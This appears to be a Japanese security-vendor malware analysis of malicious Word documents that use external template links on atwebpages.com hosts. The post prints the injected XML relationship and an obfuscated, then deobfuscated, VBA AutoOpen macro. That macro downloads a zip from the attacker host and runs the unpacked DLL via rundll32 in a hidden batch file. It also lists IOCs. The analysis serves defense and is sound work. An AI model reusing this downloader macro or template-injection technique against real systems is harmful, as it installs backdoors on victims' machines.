類似ドメイン形式の External リンクを使用した不正な Word ドキュメント

最近攻撃が確認されている不正な Word ドキュメントは、そのほとんどがマクロ形式であるが、今回 ASEC 分析チームは、このマクロ形式の不正な Word を実行させるための上位攻撃プロセスにおいて C2 が有効である External リンクの Word を利用したケースを確認した。この方式は過去ブログでも説明したことがあり、主に対北朝鮮関連の本文内容を含む不正な Word において使われていた。

以前のケースと同様に、同じプロセスによって動作するこの不正な Word の実行フローは以下の通りである。

  • 実行フロー:不正な XML(External リンク接続)が含まれた Word を実行したあと、追加の不正なファイルをダウンロード → 不正なマクロが含まれた Word をダウンロード → マクロによって追加の不正な PE バックドアをダウンロード

特に、今回 External リンクへの接続に使用されたアドレスは、北朝鮮の攻撃グループがよく使用していた特定のドメインホスティング atwebpages[.]com を利用したものであった。このドメインの使用ケースのうち「kr[数字].atwebpages[.]com」のような形式のドメインが使用された履歴は以下の通りである。

hxxp://kr4952.atwebpages[.]com/view.php?id=1 当該アドレスを使用した不正なドキュメントのファイル名

[機密]検討資料.docx
インドネシア現地法人関連.docx
hxxp://kr7593.atwebpages[.]com/view.php?id=1 当該アドレスを使用した不正なドキュメントのファイル名

[機密]検討資料.docx
hxxp://kr2959.atwebpages[.]com/view.php?id=1 当該アドレスを使用した不正なドキュメントのファイル名

マーケティング.docx
修正事項.docx
[表1] – 「kr[数字].atwebpages[.]com」形式を利用した不正な Word のファイル名

今回確認されたケースは以下のような XML 形式であり、「hxxp://kr9235.atwebpages[.]com/view.php?id=1」への接続を試み、追加でマクロ形式の不正な Word をダウンロードする。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="http://kr9235.atwebpages.com/view.php?id=1" TargetMode="External"/></Relationships>

ダウンロードした Word のマクロは以下のように難読化されており、追加ファイルのダウンロードを試みる。

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cv" & CQka & "wiq" & MnkuM & ".zi" & MnkuM & "p"
    ui = "htt" & CQka & "p:/" & MnkuM & "/kr" & MnkuM & "923" & CQka & "5.a" & MnkuM & "twe" & CQka & "bpa" & CQka & "ges" & CQka & ".co" & CQka & "m/v" & CQka & "iew" & CQka & ".ph" & MnkuM & "p?id" & CQka & "=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wie" & CQka & "b.d" & CQka & "at"
    Set fso = CreateObject("Scr" & CQka & "ipt" & CQka & "ing" & MnkuM & ".Fi" & CQka & "leS" & CQka & "yst" & MnkuM & "emO" & MnkuM & "bje" & CQka & "ct")
    fso.DeleteFile rp
    btTxt = "run" & CQka & "dll" & MnkuM & "32." & MnkuM & "exe" & CQka & " """ & df & "\wi" & MnkuM & "eb." & MnkuM & "dat" & MnkuM & """ " & CQka & "Run" & vbNewLine & "del" & MnkuM & " /f" & CQka & " /q" & MnkuM & " %0"
    WriteTextFile df & "\nw" & CQka & "ib." & MnkuM & "bat", btTxt, "asc" & MnkuM & "ii"
    
    Set wmObjStart = GetObject("win" & MnkuM & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & CQka & "Pro" & CQka & "ces" & CQka & "sSt" & MnkuM & "art" & MnkuM & "up")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0
    
    
    Set wmObj = GetObject("win" & CQka & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & MnkuM & "pro" & CQka & "ces" & MnkuM & "s")
    res = wmObj.Create(df & "\nw" & CQka & "ib." & MnkuM & "bat", Null, objConfig, pid)
End Sub
Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "6tf" & CQka & "c&Y" & CQka & "GV"
    ViewPage ("xxx")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        Macro1 (tmp.Path)
        Exit For
    End If
    Next
End Sub

この時に確認されるマクロコードにおいて、特定のパスワードで保護機能を解除したあとドキュメント内容の有効化を試みることからして、上記 XML を含むドキュメントに特定の本文内容があるものと推定される。

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cvwiq.zip"
    ui = "http://kr9235.atwebpages.com/view.php?q=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wieb.dat"
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile rp
    btTxt = "rundll32.exe """ & df & "\wieb.dat"" Run" & vbNewLine & "del /f /q %0"
    WriteTextFile df & "\nwib.bat", btTxt, "ascii"
    
    Set wmObjStart = GetObject("winmgmts:win32_ProcessStartup")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0

難読化を解除したコードは上記の通りであり、コードから確認できるように以下のような順序で動作していき、最終的にダウンロードされた PE はバックドア機能を実行する。

  • マクロ実行順序:本ドキュメントの保護機能を解除 → 挿入された画像ファイルの削除 → 非表示のテキストを有効化 → 「hxxp://kr9235.atwebpages[.]com/view.php?q=2」から追加の圧縮ファイル cvwiq.zip をダウンロードしたあと、解凍 → wieb.dat で解凍された不正な DLL を rundll32.exe によって実行

上記[表1]で取り上げた「[機密]検討資料.docx」のうち確保されたドキュメントのケースの場合も、それ以降にダウンロードされたマクロは確保できなかったが、上記マクロ類と類似した Word をダウンロードして動作するものと見られる。その理由は、このファイルにもドキュメントに保護機能が設定されており、特定の画像と非表示のテキストが存在するためである。ただし、当該ファイルは以下のように SimSun という中国語フォントを使用しており、解析時の Office 環境も中国語が実行されるように設定されていた。

<w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
[図1] – [機密]検討資料.docx の実行画面

上記で説明した通り、当該ファイルには保護機能が設定されており、[図1]のような画像が本文に含まれている。ASEC 分析チームでは、これまでの解析を通じて確保したパスワードを使用し、手動で当該ドキュメントの保護機能を解除し、画像を削除、および保護されたテキストの有効化を試みた。しかし、残念ながら当該ドキュメントはテスト形式であるかのごとく、中国語環境でも本文内容が正常に有効化されることはなかった。

しかしながら、従来と同じ攻撃フローを使用した不正なファイルが製作中であるという状況を補捉したため、当社では継続的にこのタイプの不正な Word ドキュメントをモニタリングしていく。

ユーザーは出どころが不明なドキュメントを閲覧しないようにし、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるようにしなければならない。

[ファイル検知]
Downloader/XML.External
Downloader/DOC.Akdoor

[IOC]
6757787a71561abdf0327e665eb17e8d
4a5661ef2612c914a2ad5c1b6cf98ba1
hxxp://kr4952.atwebpages[.]com/view.php?id=1
hxxp://kr7593.atwebpages[.]com/view.php?id=1
hxxp://kr2959.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?q=2

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments